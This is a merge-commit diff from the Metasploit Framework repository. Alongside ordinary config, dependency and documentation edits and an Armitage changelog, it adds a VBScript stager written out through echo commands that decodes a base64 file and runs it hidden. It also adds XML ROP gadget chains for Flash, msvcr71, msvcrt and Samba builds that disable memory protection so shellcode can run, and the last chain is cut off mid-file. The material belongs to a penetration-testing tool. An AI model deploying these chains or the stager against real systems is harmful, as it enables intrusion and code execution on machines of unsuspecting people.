Merge branch 'master' into averagesecurityguy-master
commit
860ebbcfb1
|
@ -1,10 +1,23 @@
|
|||
# Rubymine project directory
|
||||
.idea
|
||||
# RVM control file
|
||||
.rvmrc
|
||||
# YARD cache directory
|
||||
.yardoc
|
||||
# Mac OS X files
|
||||
.DS_Store
|
||||
# simplecov coverage data
|
||||
coverage
|
||||
data/meterpreter/ext_server_pivot.dll
|
||||
data/meterpreter/ext_server_pivot.x64.dll
|
||||
doc
|
||||
external/source/meterpreter/java/bin
|
||||
external/source/meterpreter/java/build
|
||||
external/source/meterpreter/java/extensions
|
||||
external/source/javapayload/bin
|
||||
external/source/javapayload/build
|
||||
# Packaging directory
|
||||
pkg
|
||||
tags
|
||||
*.swp
|
||||
*.orig
|
||||
|
|
|
@ -0,0 +1,8 @@
|
|||
language: ruby
|
||||
rvm:
|
||||
- '1.8.7'
|
||||
- '1.9.3'
|
||||
|
||||
notifications:
|
||||
irc: "irc.freenode.org#msfnotify"
|
||||
|
|
@ -0,0 +1,33 @@
|
|||
# Contributing to Metasploit
|
||||
|
||||
## Reporting Bugs
|
||||
|
||||
If you would like to report a bug, please take a look at [our Redmine
|
||||
issue
|
||||
tracker](https://dev.metasploit.com/redmine/projects/framework/issues?query_id=420)
|
||||
-- your bug may already have been reported there! Simply [searching](https://dev.metasploit.com/redmine/projects/framework/search) for some appropriate keywords may save everyone a lot of hassle.
|
||||
|
||||
If your bug is new and you'd like to report it you will need to
|
||||
[register
|
||||
first](https://dev.metasploit.com/redmine/account/register). Don't
|
||||
worry, it's easy and fun and takes about 30 seconds.
|
||||
|
||||
## Contributing Metasploit Modules
|
||||
|
||||
If you have an exploit that you'd like to contribute to the Metasploit
|
||||
Framework, please familiarize yourself with the
|
||||
**[HACKING](https://github.com/rapid7/metasploit-framework/blob/master/HACKING)**
|
||||
document in the
|
||||
Metasploit-Framework repository. There are many mysteries revealed in
|
||||
HACKING concerning code style and content.
|
||||
|
||||
[Pull requests](https://github.com/rapid7/metasploit-framework/pulls)
|
||||
should corellate with modules at a 1:1 ratio
|
||||
-- there is rarely a good reason to have two, three, or ten modules on
|
||||
one pull request, as this dramatically increases the review time
|
||||
required to land (commit) any of those modules.
|
||||
|
||||
Pull requests tend to be very collaborative for Metasploit -- do not be
|
||||
surprised if your pull request to rapid7/metasploit-framework triggers a
|
||||
pull request back to your own fork. In this way, we can isolate working
|
||||
changes before landing your PR to the Metasploit master branch.
|
34
Gemfile
34
Gemfile
|
@ -1,6 +1,30 @@
|
|||
source 'http://rubygems.org'
|
||||
gem 'rails', '3.2.2'
|
||||
gem 'metasploit_data_models', '0.0.2', :git => "git://github.com/rapid7/metasploit_data_models.git"
|
||||
gem 'pg', '>=0.13'
|
||||
gem 'msgpack'
|
||||
gem 'nokogiri'
|
||||
|
||||
# Need 3+ for ActiveSupport::Concern
|
||||
gem 'activesupport', '>= 3.0.0'
|
||||
# Needed for Msf::DbManager
|
||||
gem 'activerecord'
|
||||
# Database models shared between framework and Pro.
|
||||
gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0'
|
||||
# Needed for module caching in Mdm::ModuleDetails
|
||||
gem 'pg', '>= 0.11'
|
||||
|
||||
group :development do
|
||||
# Markdown formatting for yard
|
||||
gem 'redcarpet'
|
||||
# generating documentation
|
||||
gem 'yard'
|
||||
end
|
||||
|
||||
group :development, :test do
|
||||
# running documentation generation tasks and rspec tasks
|
||||
gem 'rake'
|
||||
end
|
||||
|
||||
group :test do
|
||||
# testing framework
|
||||
gem 'rspec', '>= 2.12'
|
||||
# code coverage for tests
|
||||
# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
|
||||
gem 'simplecov', '0.5.4', :require => false
|
||||
end
|
||||
|
|
|
@ -0,0 +1,68 @@
|
|||
GIT
|
||||
remote: git://github.com/rapid7/metasploit_data_models.git
|
||||
revision: 73f26789500f278dd6fd555e839d09a3b81a05f4
|
||||
tag: 0.3.0
|
||||
specs:
|
||||
metasploit_data_models (0.3.0)
|
||||
activerecord
|
||||
activesupport
|
||||
pg
|
||||
pry
|
||||
|
||||
GEM
|
||||
remote: http://rubygems.org/
|
||||
specs:
|
||||
activemodel (3.2.9)
|
||||
activesupport (= 3.2.9)
|
||||
builder (~> 3.0.0)
|
||||
activerecord (3.2.9)
|
||||
activemodel (= 3.2.9)
|
||||
activesupport (= 3.2.9)
|
||||
arel (~> 3.0.2)
|
||||
tzinfo (~> 0.3.29)
|
||||
activesupport (3.2.9)
|
||||
i18n (~> 0.6)
|
||||
multi_json (~> 1.0)
|
||||
arel (3.0.2)
|
||||
builder (3.0.4)
|
||||
coderay (1.0.8)
|
||||
diff-lcs (1.1.3)
|
||||
i18n (0.6.1)
|
||||
method_source (0.8.1)
|
||||
multi_json (1.0.4)
|
||||
pg (0.14.1)
|
||||
pry (0.9.10)
|
||||
coderay (~> 1.0.5)
|
||||
method_source (~> 0.8)
|
||||
slop (~> 3.3.1)
|
||||
rake (10.0.2)
|
||||
redcarpet (2.2.2)
|
||||
rspec (2.12.0)
|
||||
rspec-core (~> 2.12.0)
|
||||
rspec-expectations (~> 2.12.0)
|
||||
rspec-mocks (~> 2.12.0)
|
||||
rspec-core (2.12.1)
|
||||
rspec-expectations (2.12.0)
|
||||
diff-lcs (~> 1.1.3)
|
||||
rspec-mocks (2.12.0)
|
||||
simplecov (0.5.4)
|
||||
multi_json (~> 1.0.3)
|
||||
simplecov-html (~> 0.5.3)
|
||||
simplecov-html (0.5.3)
|
||||
slop (3.3.3)
|
||||
tzinfo (0.3.35)
|
||||
yard (0.8.3)
|
||||
|
||||
PLATFORMS
|
||||
ruby
|
||||
|
||||
DEPENDENCIES
|
||||
activerecord
|
||||
activesupport (>= 3.0.0)
|
||||
metasploit_data_models!
|
||||
pg (>= 0.11)
|
||||
rake
|
||||
redcarpet
|
||||
rspec (>= 2.12)
|
||||
simplecov (= 0.5.4)
|
||||
yard
|
8
HACKING
8
HACKING
|
@ -34,7 +34,7 @@ puts.
|
|||
2. Don't read from standard input, doing so will make your code
|
||||
lock up the entire module when called from other interfaces. If you
|
||||
need user input, you can either register an option or expose an
|
||||
interactve session type specific for the type of exploit.
|
||||
interactive session type specific for the type of exploit.
|
||||
|
||||
3. Don't use "sleep". It has been known to cause issues with
|
||||
multi-threaded programs on various platforms. Instead, we use
|
||||
|
@ -48,7 +48,7 @@ the creation of ruby sockets and won't know how to clean them up in
|
|||
case your module raises an exception without cleaning up after itself.
|
||||
Secondly, non-Rex sockets do not know about routes and therefore can't
|
||||
be used through a meterpreter tunnel. Lastly, regular sockets miss
|
||||
out on msf's proxy and ssl features. Msf includes many protocols
|
||||
out on msf's proxy and SSL features. Msf includes many protocols
|
||||
already implemented with Rex and if the protocol you need is missing,
|
||||
porting another library to use them is straight-forward. See our
|
||||
Net::SSH modifications in lib/net/ssh/ for an example.
|
||||
|
@ -121,8 +121,8 @@ development team. Note that this process requires a GitHub account.
|
|||
|
||||
For Git commits, please adhere to 50/72 formatting: your commits should
|
||||
start with a line 50 characters or less, followed by a blank line,
|
||||
followed by one or more lines of explanitory text wrapped at at 72
|
||||
characters Pull requests with commits not formmated this way will
|
||||
followed by one or more lines of explanatory text wrapped at at 72
|
||||
characters Pull requests with commits not formatted this way will
|
||||
be rejected without review.
|
||||
|
||||
For modules, note that Author field is not automatic, and should be
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
|
||||
Metasploit
|
||||
Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.png)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://codeclimate.com/badge.png)](https://codeclimate.com/github/rapid7/metasploit-framework)
|
||||
==
|
||||
The Metasploit Framework is released under a BSD-style license. See
|
||||
COPYING for more details.
|
||||
|
@ -40,10 +40,11 @@ reading some of the great tutorials online:
|
|||
|
||||
Contributing
|
||||
--
|
||||
See the [Dev Environment Setup][wiki-devenv] guide on github which will
|
||||
See the [Dev Environment Setup][wiki-devenv] guide on GitHub which will
|
||||
walk you through the whole process starting from installing all the
|
||||
dependencies, to cloning the repository, and finally to submitting a
|
||||
pull request.
|
||||
pull request. For slightly more info, see
|
||||
[Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
|
||||
|
||||
|
||||
[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment "Metasploit Development Environment Setup"
|
||||
|
|
|
@ -0,0 +1,47 @@
|
|||
require 'bundler/setup'
|
||||
|
||||
require 'rspec/core/rake_task'
|
||||
require 'yard'
|
||||
|
||||
RSpec::Core::RakeTask.new(:spec)
|
||||
|
||||
task :default => :spec
|
||||
|
||||
namespace :yard do
|
||||
yard_files = [
|
||||
# Ruby source files first
|
||||
'lib/msf/**/*.rb',
|
||||
'lib/rex/**/*.rb',
|
||||
# Anything after '-' is a normal documentation, not source
|
||||
'-',
|
||||
'COPYING',
|
||||
'HACKING',
|
||||
'THIRD-PARTY.md'
|
||||
]
|
||||
yard_options = [
|
||||
# include documentation for protected methods for developers extending the code.
|
||||
'--protected'
|
||||
]
|
||||
|
||||
YARD::Rake::YardocTask.new(:doc) do |t|
|
||||
t.files = yard_files
|
||||
# --no-stats here as 'stats' task called after will print fuller stats
|
||||
t.options = yard_options + ['--no-stats']
|
||||
|
||||
t.after = Proc.new {
|
||||
Rake::Task['yard:stats'].execute
|
||||
}
|
||||
end
|
||||
|
||||
desc "Shows stats for YARD Documentation including listing undocumented modules, classes, constants, and methods"
|
||||
task :stats => :environment do
|
||||
stats = YARD::CLI::Stats.new
|
||||
yard_arguments = yard_options + ['--compact', '--list-undoc'] + yard_files
|
||||
stats.run(*yard_arguments)
|
||||
end
|
||||
end
|
||||
|
||||
# @todo Figure out how to just clone description from yard:doc
|
||||
desc "Generate YARD documentation"
|
||||
# allow calling namespace to as a task that goes to default task for namespace
|
||||
task :yard => ['yard:doc']
|
Binary file not shown.
Binary file not shown.
|
@ -1,6 +1,46 @@
|
|||
Armitage Changelog
|
||||
==================
|
||||
|
||||
26 Nov 12 (tested against msf 16114)
|
||||
---------
|
||||
- Windows command shell tab is now friendlier to commands that prompt
|
||||
for input (e.g., time command)
|
||||
- [host] -> Meterpreter -> Access -> Escalate Privileges now shows all
|
||||
the framework's new exploit/windows/local modules too
|
||||
- [host] -> Shell -> Post Modules now shows the framework's unix/local
|
||||
and exploit/linux/local modules
|
||||
- Added Ctrl+I shortcut. Lets you choose a session to interact with.
|
||||
- Added Steal Token button to Processes dialog.
|
||||
- Armitage now asks Metasploit for a non-expiring authentication token.
|
||||
This will prevent Armitage from losing its access to msfrpcd when you
|
||||
put your computer to sleep or pause the VM running Metasploit.
|
||||
- add_user and add_[local]group_user now show all of their output when
|
||||
the -h flag is used to operate on a remote host.
|
||||
- added a Delete menu to creds table. Right-click a cred to delete it
|
||||
|
||||
Cortana Updates (for scripters)
|
||||
--------
|
||||
- aliased &data_delete to &data_clear to match the documentation.
|
||||
- &file_get, &loot_get, and &file_content no longer delete the remote
|
||||
file when connected to a teamserver.
|
||||
|
||||
16 Oct 12 (tested against msf 15972)
|
||||
---------
|
||||
- Added port 5985 to MSF Scans list.
|
||||
- Meterpreter -> Access -> Persistence sets ACTION option for you
|
||||
- Changed how LHOST and LPORT are set globally to prevent Ruby
|
||||
character encoding conversion error in the framework.
|
||||
- Pass Session, Log Keystrokes, and Persist now query module info
|
||||
in a separate thread (avoids a deadlock opportunity)
|
||||
- Armitage now shows folder/URL in a popup dialog for environments
|
||||
where JDesktop API to open them directly is not supported
|
||||
- Check all credentials option now filters the list to avoid trying
|
||||
a pair of credentials twice.
|
||||
- Armitage's exploit payload selection now selects cmd/unix/interact
|
||||
when appropriate.
|
||||
- Explore -> Processes now works with Java Meterpreter again.
|
||||
- MSF Scans feature now runs http_version against port 443
|
||||
|
||||
5 Sept 12 (tested against msf r15804)
|
||||
---------
|
||||
- Setup dialog now trims host, port, user, and pass fields.
|
||||
|
|
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,41 @@
|
|||
echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
|
||||
echo Set file = fs.GetFile("ENCODED") >>decode_stub
|
||||
echo If file.Size Then >>decode_stub
|
||||
echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
|
||||
echo data = fd.ReadAll >>decode_stub
|
||||
echo data = Replace(data, vbCrLf, "") >>decode_stub
|
||||
echo data = base64_decode(data) >>decode_stub
|
||||
echo fd.Close >>decode_stub
|
||||
echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
|
||||
echo ofs.Write data >>decode_stub
|
||||
echo ofs.close >>decode_stub
|
||||
echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
|
||||
echo shell.run "DECODED", 0, false >>decode_stub
|
||||
echo Wscript.sleep(1000 * 60 * 5) >>decode_stub
|
||||
echo Else >>decode_stub
|
||||
echo Wscript.Echo "The file is empty." >>decode_stub
|
||||
echo End If >>decode_stub
|
||||
echo Function base64_decode(byVal strIn) >>decode_stub
|
||||
echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
|
||||
echo For n = 1 To Len(strIn) Step 4 >>decode_stub
|
||||
echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
|
||||
echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
|
||||
echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
|
||||
echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
|
||||
echo If Not w2 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
|
||||
echo If Not w3 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
|
||||
echo If Not w4 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
|
||||
echo Next >>decode_stub
|
||||
echo base64_decode = strOut >>decode_stub
|
||||
echo End Function >>decode_stub
|
||||
echo Function mimedecode(byVal strIn) >>decode_stub
|
||||
echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
|
||||
echo If Len(strIn) = 0 Then >>decode_stub
|
||||
echo mimedecode = -1 : Exit Function >>decode_stub
|
||||
echo Else >>decode_stub
|
||||
echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
|
||||
echo End If >>decode_stub
|
||||
echo End Function >>decode_stub
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,80 @@
|
|||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<db>
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>11.3.300.257</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x10000000">
|
||||
<gadget offset="0x00243043">POP EAX # RETN</gadget>
|
||||
<gadget offset="0x006e3384">ptr to VirtualProtect()</gadget>
|
||||
<gadget offset="0x0044a4aa">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
|
||||
<gadget offset="0x003d54df">XCHG EAX,ESI # RETN</gadget>
|
||||
<gadget offset="0x005f0b25">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x002ed0f1">jmp esp</gadget>
|
||||
<gadget offset="0x003eb988">POP EBX # RETN</gadget>
|
||||
<gadget value="0x00000400">0x00000400-> ebx</gadget>
|
||||
<gadget offset="0x00662e60">POP EDX # RETN</gadget>
|
||||
<gadget value="0x00000040">0x00000040-> edx</gadget>
|
||||
<gadget offset="0x0058289d">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x00955ebe">Writable location</gadget>
|
||||
<gadget offset="0x00414e84">POP EDI # RETN</gadget>
|
||||
<gadget offset="0x004de801">RETN (ROP NOP)</gadget>
|
||||
<gadget offset="0x0024044c">POP EAX # RETN</gadget>
|
||||
<gadget value="nop">nop</gadget>
|
||||
<gadget offset="0x00627674">PUSHAD # RETN</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>11.3.300.265</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x10000000">
|
||||
<gadget offset="0x00487414">POP EAX # RETN</gadget>
|
||||
<gadget offset="0x006e338c">ptr to VirtualProtect()</gadget>
|
||||
<gadget offset="0x00437d39">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
|
||||
<gadget offset="0x0008f9c6">XCHG EAX,ESI # RETN</gadget>
|
||||
<gadget offset="0x000baf77">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x002d8d5c">jmp esp</gadget>
|
||||
<gadget offset="0x00005604">POP EBX # RETN</gadget>
|
||||
<gadget value="0x00000400">0x00000400-> ebx</gadget>
|
||||
<gadget offset="0x0064a4d7">POP EDX # RETN</gadget>
|
||||
<gadget value="0x00000040">0x00000040-> edx</gadget>
|
||||
<gadget offset="0x004087db">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x00955197">Writable location</gadget>
|
||||
<gadget offset="0x005be57f">POP EDI # RETN</gadget>
|
||||
<gadget offset="0x003a0002">RETN (ROP NOP)</gadget>
|
||||
<gadget offset="0x00244a82">POP EAX # RETN</gadget>
|
||||
<gadget value="nop">nop</gadget>
|
||||
<gadget offset="0x004cbc7f">PUSHAD # RETN</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>11.3.300.268</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x10000000">
|
||||
<gadget offset="0x0012429b">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x006e438c">ptr to VirtualProtect()</gadget>
|
||||
<gadget offset="0x00481a7d">MOV EAX,DWORD PTR DS:[ECX]</gadget>
|
||||
<gadget offset="0x006ae8d7">XCHG EAX,ESI # RETN</gadget>
|
||||
<gadget offset="0x000a6b69">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x002b95bb">jmp esp</gadget>
|
||||
<gadget offset="0x0027f328">POP EBX # RETN</gadget>
|
||||
<gadget value="0x00000400">0x00000400-> ebx</gadget>
|
||||
<gadget offset="0x00686fe5">POP EDX # RETN</gadget>
|
||||
<gadget value="0x00000040">0x00000040-> edx</gadget>
|
||||
<gadget offset="0x0017e345">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x0092027a">Writable location</gadget>
|
||||
<gadget offset="0x002a394a">POP EDI # RETN</gadget>
|
||||
<gadget offset="0x00593802"># RETN (ROP NOP)</gadget>
|
||||
<gadget offset="0x002447d1">POP EAX # RETN</gadget>
|
||||
<gadget value="nop">nop</gadget>
|
||||
<gadget offset="0x0062857d">PUSHAD # RETN</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
</db>
|
|
@ -0,0 +1,27 @@
|
|||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<db>
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>*</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x7c340000">
|
||||
<gadget offset="0x0000252c">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x0000252c">skip 4 bytes</gadget>
|
||||
<gadget offset="0x0002c55a">POP EBX # RETN</gadget>
|
||||
<gadget value="0x00000400">0x00000400-> ebx</gadget>
|
||||
<gadget offset="0x00005249">POP EDX # RETN</gadget>
|
||||
<gadget value="0x00000040">0x00000040-> edx</gadget>
|
||||
<gadget offset="0x000011c0">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x00051897">Writable location</gadget>
|
||||
<gadget offset="0x0000b8d7">POP EDI # RETN</gadget>
|
||||
<gadget offset="0x00006c0b">RETN (ROP NOP)</gadget>
|
||||
<gadget offset="0x00026fa6">POP ESI # RETN</gadget>
|
||||
<gadget offset="0x000015a2">JMP [EAX]</gadget>
|
||||
<gadget offset="0x000362fb">POP EAX # RETN</gadget>
|
||||
<gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>
|
||||
<gadget offset="0x00038c81">PUSHAD # ADD AL,0EF # RETN</gadget>
|
||||
<gadget offset="0x00005c30">ptr to 'push esp # ret</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
</db>
|
|
@ -0,0 +1,56 @@
|
|||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<db>
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>WINDOWS XP SP2</target>
|
||||
<target>WINDOWS XP SP3</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x77c10000">
|
||||
<gadget offset="0x0002ee15">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x0002ee15">skip 4 bytes</gadget>
|
||||
<gadget offset="0x0003fa1c">POP EBX # RETN</gadget>
|
||||
<gadget value="0x00000400">0x00000400-> ebx</gadget>
|
||||
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
|
||||
<gadget value="0x00000040">0x00000040-> edx</gadget>
|
||||
<gadget offset="0x0002eeef">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x0004d9bb">Writable location</gadget>
|
||||
<gadget offset="0x0001a88c">POP EDI # RETN</gadget>
|
||||
<gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
|
||||
<gadget offset="0x0002a184">POP ESI # RETN</gadget>
|
||||
<gadget offset="0x0001aacc">JMP [EAX]</gadget>
|
||||
<gadget offset="0x0002b860">POP EAX # RETN</gadget>
|
||||
<gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
|
||||
<gadget offset="0x00002df9">PUSHAD # RETN</gadget>
|
||||
<gadget offset="0x00025459">ptr to 'push esp # ret</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>WINDOWS SERVER 2003 SP1</target>
|
||||
<target>WINDOWS SERVER 2003 SP2</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x77ba0000">
|
||||
<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
|
||||
<gadget offset="0x00001114">ptr to VirtualProtect()</gadget>
|
||||
<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
|
||||
<gadget value="junk">Filler</gadget>
|
||||
<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
|
||||
<gadget offset="0x00026320">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x00042265">PUSH ESP # RETN</gadget>
|
||||
<gadget offset="0x000385b7">POP EBX # RETN</gadget>
|
||||
<gadget value="0x00000400">0x00000400-> ebx</gadget>
|
||||
<gadget offset="0x0003e4fc">POP EDX # RETN</gadget>
|
||||
<gadget value="0x00000040">0x00000040-> edx</gadget>
|
||||
<gadget offset="0x000330fb">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x0004ff56">Writable location</gadget>
|
||||
<gadget offset="0x00038a92">POP EDI # RETN</gadget>
|
||||
<gadget offset="0x00037d82">RETN (ROP NOP)</gadget>
|
||||
<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
|
||||
<gadget value="nop">nop</gadget>
|
||||
<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
</db>
|
|
@ -0,0 +1,436 @@
|
|||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<db>
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>Debian Squeeze / 2:3.5.6~dfsg-3squeeze6</target>
|
||||
</compatibility>
|
||||
|
||||
<!--
|
||||
dpkg -l|grep libgcrypt
|
||||
ii libgcrypt11 1.4.5-2 LGPL Crypto library - runtime library
|
||||
b6977000-b69e8000 r-xp 00000000 08:01 160176 /usr/lib/libgcrypt.so.11.5.3
|
||||
b69e8000-b69eb000 rw-p 00070000 08:01 160176 /usr/lib/libgcrypt.so.11.5.3
|
||||
-->
|
||||
|
||||
<gadgets base="0">
|
||||
<gadget offset="0x00004d44">pop ebx ; pop ebp ; ret</gadget>
|
||||
<gadget offset="0x00071ad4">offset of .got.plt section</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x00063dbf">pop eax; ret</gadget>
|
||||
<gadget offset="0x00071af4">mmap@got - 4</gadget>
|
||||
<gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
|
||||
<gadget offset="0x00009974">jmp eax</gadget>
|
||||
<gadget offset="0x00004d41">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
||||
<gadget value ="0x00001000">mmap arg : size</gadget>
|
||||
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
||||
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
|
||||
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
|
||||
<gadget value ="0x00000000">mmap arg : off_t </gadget>
|
||||
<gadget value ="0x00000000">junk to be skipped over</gadget>
|
||||
<gadget offset="0x0006a761">pop edx ; inc ebx ; ret</gadget>
|
||||
<gadget offset="0x00073000">edx = writable location, in GOT</gadget>
|
||||
<gadget offset="0x0004159f">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x0005d4c3">xchg eax, edx ; ret || edx = MMAPed addr, dst in memcpy</gadget>
|
||||
<gadget offset="0x00060a1a">pop esi ; ret</gadget>
|
||||
<gadget offset="0x0005c01b">pop ebp ; pop ecx ; ret || ecx = esp</gadget>
|
||||
<gadget offset="0x0003da28">push esp ; and al, 0x0C ; call esi</gadget>
|
||||
<gadget offset="0x00063dbf">pop eax ; ret</gadget>
|
||||
<gadget value ="0x0000005c">eax = value to add to esp to point to shellcode</gadget>
|
||||
<gadget offset="0x000538c4">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
|
||||
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
|
||||
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
|
||||
<gadget offset="0x00055743">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
|
||||
<gadget offset="0x00063dbf">pop eax; ret</gadget>
|
||||
<gadget offset="0x00071b6c">memcpy@got - 4</gadget>
|
||||
<gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
|
||||
<gadget offset="0x00055743">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
|
||||
<!-- set ecx to same value than edx -->
|
||||
<gadget offset="0x0006e61f">xchg eax, esi ; ret || save eax</gadget>
|
||||
<gadget offset="0x00063dbf">pop eax; ret</gadget>
|
||||
<gadget offset="0x00072ffc">saved mmaped addr - 4</gadget>
|
||||
<gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = saved mmaped addr</gadget>
|
||||
<gadget offset="0x0005c914"> xchg eax, ecx ; ret ; || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
|
||||
<gadget offset="0x0006e61f"> xchg eax, esi ; ret ; || restore eax</gadget>
|
||||
<gadget offset="0x00060a1a">pop esi ; ret</gadget>
|
||||
<gadget offset="0x00071ad4">esi = offset of .got.plt section</gadget>
|
||||
<gadget offset="0x00008505">pop edi ; pop ebp **1** ; ret</gadget>
|
||||
<gadget offset="0x00004d0c">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
|
||||
<gadget value ="0x00000000">junk for ebp **1** </gadget>
|
||||
<gadget offset="0x0005b68a">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
|
||||
<gadget value ="size">payload size</gadget>
|
||||
</gadgets>
|
||||
|
||||
|
||||
|
||||
|
||||
</rop>
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2</target>
|
||||
<target>Ubuntu 11.10 / 2:3.5.11~dfsg-1ubuntu2</target>
|
||||
</compatibility>
|
||||
|
||||
<!--
|
||||
dpkg -l|grep libgcr
|
||||
ii libgcrypt11 1.5.0-1 LGPL Crypto library - runtime library
|
||||
b69e3000-b6a65000 r-xp 00000000 08:01 148828 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
|
||||
b6a65000-b6a66000 r**p 00081000 08:01 148828 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
|
||||
b6a66000-b6a68000 rw-p 00082000 08:01 148828 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
|
||||
-->
|
||||
|
||||
<gadgets base="0">
|
||||
<gadget offset="0x000048ee">pop ebx ; ret</gadget>
|
||||
<gadget offset="0x00082ff4">offset of .got.plt section</gadget>
|
||||
<gadget offset="0x0006933f">pop eax; ret</gadget>
|
||||
<gadget offset="0x000830a4">mmap@got - 4</gadget>
|
||||
<gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
|
||||
<gadget offset="0x00007d79">jmp eax</gadget>
|
||||
<gadget offset="0x00005646">add esp, 0x1C; ret || mmap ret, skip overt mmap arguments</gadget>
|
||||
<gadget value ="0x00000000">mmap arg : addr</gadget>
|
||||
<gadget value ="0x00001000">mmap arg : size</gadget>
|
||||
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
|
||||
